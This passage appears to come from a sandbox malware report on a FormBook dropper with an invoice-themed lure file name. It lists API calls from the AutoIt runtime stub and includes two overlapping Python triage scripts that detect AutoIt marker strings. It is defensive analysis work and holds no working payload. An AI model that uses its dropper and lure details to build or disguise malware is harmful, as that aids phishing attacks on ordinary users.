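    for m in re.finditer(re.escape(SCRIPT_MAGIC), data):
        hits.setdefault(SCRIPT_MAGIC.decode(), []).append((m.start(), "ascii"))
    return hits

def is_probably_autoit(data: bytes, min_markers: int = 2) -> bool:
    """The script magic alone is decisive; otherwise require several independent runtime strings."""
    hits = find_markers(data)
    return SCRIPT_MAGIC.decode() in hits or len(hits) >= min_markers

def scan_file(path: str) -> Dict[str, List[Tuple[int, str]]]:
    """Convenience wrapper: scan a file on disk."""
    with open(path, "rb") as f:
        return find_markers(f.read())

# Constructed test buffers (not real samples): padding, a UTF-16LE window title and one directive,
# and a buffer with only the generic PE/DOS stub text for the negative case.
FAKE_AUTOIT_STUB = (b"\x00" * 32 + "AutoIt v3".encode("utf-16-le") + b"\x00" * 8
                    + "#requireadmin".encode("utf-16-le") + b"\x00" * 8)
FAKE_OTHER_BINARY = b"MZ" + b"\x90" * 64 + b"This program cannot be run in DOS mode"
```

A single marker is treated as insufficient because "AutoIt v3" on its own also appears in legitimate AutoIt-built utilities; two or more runtime strings, or the script magic, is the threshold used here. A positive result only says the file is an AutoIt stub; recovering the actual script still needs a decompiler run against the embedded resource.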
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00E82CA2
                    • DeleteObject.GDI32(00000000), ref: 00E82CE8
                    • DeleteObject.GDI32(00000000), ref: 00E82CF3
                    • DestroyCursor.USER32(00000000), ref: 00E82CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00E82D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EBC68B
                    • 6F570200.COMCTL32(?,000000FF,?), ref: 00EBC6C4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EBCAED
                      • Part of subcall function 00E81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E82036,?,00000000,?,?,?,?,00E816CB,00000000,?), ref: 00E81B9A
                    • SendMessageW.USER32(?,00001053), ref: 00EBCB2A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EBCB41
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: DestroyMessageSendWindow$DeleteObject$CursorF570200InvalidateMoveRect
                    • String ID: 0
                    • API String ID: 2008601239-4108050209
                    • Opcode ID: 3084c8f4d4bcf36ba6c4f94cddd97f1bb538b0aad7506be72575b0488234fa1d
                    • Instruction ID: 6ca861d91b18a2507552a23fb36f331c56ac147dc5429b0b1db9e60b8e5fbeb6
                    • Opcode Fuzzy Hash: 3084c8f4d4bcf36ba6c4f94cddd97f1bb538b0aad7506be72575b0488234fa1d
                    • Instruction Fuzzy Hash: C412A130608201EFDB24DF24C884BAAB7E5BF45304F64556DF59AEB662C731EC41DB91
                    APIs
                    • GetSysColor.USER32(00000012), ref: 00F0AB99
                    • SetTextColor.GDI32(?,?), ref: 00F0AB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 00F0ABB3
                    • GetSysColor.USER32(0000000F), ref: 00F0ABBE
                    • CreateSolidBrush.GDI32(?), ref: 00F0ABC3
                    • GetSysColor.USER32(00000011), ref: 00F0ABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0ABE9
                    • SelectObject.GDI32(?,00000000), ref: 00F0ABFA
                    • SetBkColor.GDI32(?,00000000), ref: 00F0AC03
                    • SelectObject.GDI32(?,?), ref: 00F0AC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0AC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0AC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F0AC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F0ACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F0ACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00F0ACEC
                    • DrawFocusRect.USER32(?,?), ref: 00F0ACF7
                    • GetSysColor.USER32(00000011), ref: 00F0AD05
                    • SetTextColor.GDI32(?,00000000), ref: 00F0AD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F0AD21
                    • SelectObject.GDI32(?,00F0A869), ref: 00F0AD38
                    • DeleteObject.GDI32(?), ref: 00F0AD43
                    • SelectObject.GDI32(?,?), ref: 00F0AD49
                    • DeleteObject.GDI32(?), ref: 00F0AD4E
                    • SetTextColor.GDI32(?,?), ref: 00F0AD54
                    • SetBkColor.GDI32(?,?), ref: 00F0AD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 35fe68068a712e87ae50f50d3a45500e85a69a810d6705c75983084ab57d286f
                    • Instruction ID: 34b303649f8572aeffba43643b59e7ae6818e60c33d09b0474452c240be5fc1d
                    • Opcode Fuzzy Hash: 35fe68068a712e87ae50f50d3a45500e85a69a810d6705c75983084ab57d286f
                    • Instruction Fuzzy Hash: 6F614D71D00218EFDF219FA4DC48EAE7BB9FB08320F158125F915AB2E1D6759D40EB90
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F08D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F08D45
                    • CharNextW.USER32(0000014E), ref: 00F08D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F08DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F08DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F08DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F08DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 00F08E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F08E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F08E8C
                    • _memset.LIBCMT ref: 00F08EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F08EFA
                    • _memset.LIBCMT ref: 00F08F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F08F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F08FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00F09088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F090AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F090F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F09121
                    • DrawMenuBar.USER32(?), ref: 00F09130
                    • SetWindowTextW.USER32(?,0000014E), ref: 00F09158
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: e2f7f5cd26a379cd6894a8c104a2391a5df33db6093affa55eb90f49881a3dac
                    • Instruction ID: 4c7ae112bcca969d9433e2dada842e012e7c4f14e3cabc5fa928c991c0e591b4
                    • Opcode Fuzzy Hash: e2f7f5cd26a379cd6894a8c104a2391a5df33db6093affa55eb90f49881a3dac
                    • Instruction Fuzzy Hash: 45E19071901209ABDF209F60CC84EEE7BB9FF05760F108159F955AA2D1DB709A86FF60
                    APIs
                    • GetCursorPos.USER32(?), ref: 00F04C51
                    • GetDesktopWindow.USER32 ref: 00F04C66
                    • GetWindowRect.USER32(00000000), ref: 00F04C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F04CCF
                    • DestroyWindow.USER32(?), ref: 00F04CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F04D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F04D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F04D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00F04D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F04D90
                    • IsWindowVisible.USER32(?), ref: 00F04DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F04DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F04DDF
                    • GetWindowRect.USER32(?,?), ref: 00F04DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00F04E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00F04E37
                    • CopyRect.USER32(?,?), ref: 00F04E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00F04EB9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 28600dbb76e568d6e14543f74da680be5795b70f018cc676f58faf295e73402c
                    • Instruction ID: 5bd5b3ee407792f1075ccaff9007a29efa8732f1bf09c819b8d2fc8ce9ddde79
                    • Opcode Fuzzy Hash: 28600dbb76e568d6e14543f74da680be5795b70f018cc676f58faf295e73402c
                    • Instruction Fuzzy Hash: 7CB18FB1A04340AFDB14DF64C845B6ABBE4FF84710F04891CF599AB2A1D771EC05EB55
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E828BC
                    • GetSystemMetrics.USER32(00000007), ref: 00E828C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E828EF
                    • GetSystemMetrics.USER32(00000008), ref: 00E828F7
                    • GetSystemMetrics.USER32(00000004), ref: 00E8291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E82939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E82949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E8297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E82990
                    • GetClientRect.USER32(00000000,000000FF), ref: 00E829AE
                    • GetStockObject.GDI32(00000011), ref: 00E829CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E829D5
                      • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                      • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                      • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                    • SetTimer.USER32(00000000,00000000,00000028,00E81256), ref: 00E829FC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 68d4d5aa246f8c7b4ca7d8c27c9c4a61f9c888a36e5c92c4eae5367582744c11
                    • Instruction ID: 6a9f63ee3f401661a406faf7b773db282d56314721f80ac0e336bc9d9d852fb3
                    • Opcode Fuzzy Hash: 68d4d5aa246f8c7b4ca7d8c27c9c4a61f9c888a36e5c92c4eae5367582744c11
                    • Instruction Fuzzy Hash: 6EB15E75A0020AAFDB14EFA8DC45BEE7BB4FB08714F109229FA19E7290DB749841DB51
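The functions recovered above are the AutoIt v3 runtime stub rather than FormBook itself: the directive parser (`#include`, `#requireadmin`, `#OnAutoItStartRegister`, ...) and the GUI code that registers the `AutoIt v3 GUI` window class. Those strings are a quick way to confirm "compiled AutoIt script" during triage before pulling the embedded script out. The helper below is an added example written for this report, not Joe Sandbox output and not part of the sample; its marker list is taken from the strings listed in these records, and it assumes (because the parser compares them with the wide-char `__wcsnicmp`) that the runtime stores them as UTF-16LE, so it searches both UTF-16LE and plain ASCII encodings. The embedded sample buffer is constructed for the demonstration and is not data from the analysed binary.

```python
"""Triage helper: locate AutoIt v3 runtime marker strings in a PE image.

Added example for this report (not Joe Sandbox output, not code from the sample).
Marker list: strings the IDA plugin recovered from the memory dump above.
Assumption: markers are stored as UTF-16LE wide strings (the parser routine
compares them with __wcsnicmp), so a plain ASCII grep would miss them.
"""
from __future__ import annotations

import sys
from dataclasses import dataclass

# Strings recovered from the memory dump in this report.
AUTOIT_MARKERS = (
    "AutoIt v3 GUI",           # window class created by the runtime GUI code
    "#OnAutoItStartRegister",  # script directive table in the parser routine
    "#requireadmin",
    "#notrayicon",
    "#pragma compile",
    "Bad directive syntax error",
    "Cannot parse #include",
)


@dataclass(frozen=True)
class Hit:
    marker: str
    encoding: str
    offset: int


def find_autoit_markers(data: bytes, markers=AUTOIT_MARKERS) -> list[Hit]:
    """Return every occurrence of a marker, in either encoding, sorted by offset."""
    hits: list[Hit] = []
    for marker in markers:
        for enc in ("utf-16-le", "ascii"):
            needle = marker.encode(enc)
            start = 0
            while (pos := data.find(needle, start)) != -1:
                hits.append(Hit(marker, enc, pos))
                start = pos + 1
    return sorted(hits, key=lambda h: h.offset)


def likely_compiled_autoit(data: bytes, min_distinct: int = 2) -> bool:
    """Require several distinct markers so one stray string does not trigger."""
    return len({h.marker for h in find_autoit_markers(data)}) >= min_distinct


# Constructed sample buffer (NOT the real binary): an MZ header stub followed by
# two of the markers encoded the way the runtime stores them.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 64
    + "AutoIt v3 GUI".encode("utf-16-le") + b"\x00" * 16
    + "#requireadmin".encode("utf-16-le") + b"\x00" * 8
)


def main(argv: list[str]) -> None:
    data = open(argv[1], "rb").read() if len(argv) > 1 else SAMPLE
    for h in find_autoit_markers(data):
        print(f"{h.offset:#010x}  {h.encoding:9s}  {h.marker}")
    print("compiled AutoIt likely:", likely_compiled_autoit(data))


if __name__ == "__main__":
    main(sys.argv)
```

Run it with a file path to scan a real dropper; with no argument it scans the constructed buffer. A positive result only says the file is an AutoIt stub, which is the wrapper here, not the FormBook payload; the next step is extracting and decompiling the embedded script.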
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscat$D51560_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 3427191167-1459072770
                    • Opcode ID: 559860849919a6740c25b17b1595f75e7ea8e278fae1bd41ac6080a0e28d075d
                    • Instruction ID: b812f9c653c417cddab8c1c3d130214c047ec9b1330bd73d42be53549800c435
                    • Opcode Fuzzy Hash: 559860849919a6740c25b17b1595f75e7ea8e278fae1bd41ac6080a0e28d075d
                    • Instruction Fuzzy Hash: A8412B76A00244BADB14A7758C43EBF77ECDF4A750F00106AF904FA1C2EB75E901A6B6
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00F040F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F041B6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 774db0005947e6ea3fb68c73b96d617af0924dfa335929a4cb6e8a06a8ab0441
                    • Instruction ID: 9adc3119abac3979e25d2f8cf0b9333bc2b1f5c1a1d0ec74e2d0955723bafaca
                    • Opcode Fuzzy Hash: 774db0005947e6ea3fb68c73b96d617af0924dfa335929a4cb6e8a06a8ab0441
                    • Instruction Fuzzy Hash: 8CA180B16142019FCB14EF10C991A6AB3E5BF88324F145969B99A6B3D3DB30FC05EB51
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 00EF5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00EF5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00EF531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00EF532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00EF5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 00EF5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 00EF534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00EF5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00EF5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 00EF536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00EF5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00EF5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 00EF538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00EF5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 00EF53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00EF53AE
                    • GetCursorInfo.USER32(?), ref: 00EF53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 00EF53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: cc0509aa37f15fda3d761bc3a9811982b1112b17ed42018c610b58770d175009
                    • Instruction ID: 6005bdd4da8ca8ac5bc1ae0995f17a4f1d651a93e058ad20e7249da3e5092423
                    • Opcode Fuzzy Hash: cc0509aa37f15fda3d761bc3a9811982b1112b17ed42018c610b58770d175009
                    • Instruction Fuzzy Hash: 5B418470E043196ADB109FBA8C4986FFFF8EF51B10B10452FE619E7291DAB8A401CE91
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 00EDAAA5
                    • __swprintf.LIBCMT ref: 00EDAB46
                    • _wcscmp.LIBCMT ref: 00EDAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EDABAE
                    • _wcscmp.LIBCMT ref: 00EDABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 00EDAC21
                    • GetDlgCtrlID.USER32(?), ref: 00EDAC73
                    • GetWindowRect.USER32(?,?), ref: 00EDACA9
                    • GetParent.USER32(?), ref: 00EDACC7
                    • ScreenToClient.USER32(00000000), ref: 00EDACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 00EDAD48
                    • _wcscmp.LIBCMT ref: 00EDAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 00EDAD82
                    • _wcscmp.LIBCMT ref: 00EDAD96
                      • Part of subcall function 00EA386C: _iswctype.LIBCMT ref: 00EA3874
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 344dfd612e22005c06ea2f26b8a787cdddcb261dd18429f27072459a745b9839
                    • Instruction ID: c37684a7228acb7e12b84fab2865951556d80272819cf3b007bdb0a513febb96
                    • Opcode Fuzzy Hash: 344dfd612e22005c06ea2f26b8a787cdddcb261dd18429f27072459a745b9839
                    • Instruction Fuzzy Hash: D4A1C771204706AFD714DF24C884BAAF7E9FF04319F14563AF999E2690D730EA46CB92
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00EDB3DB
                    • _wcscmp.LIBCMT ref: 00EDB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EDB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 00EDB431
                    • _wcscmp.LIBCMT ref: 00EDB44F
                    • _wcsstr.LIBCMT ref: 00EDB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDB498
                    • _wcscmp.LIBCMT ref: 00EDB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EDB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00EDB518
                    • _wcscmp.LIBCMT ref: 00EDB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00EDB550
                    • GetWindowRect.USER32(00000004,?), ref: 00EDB5B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
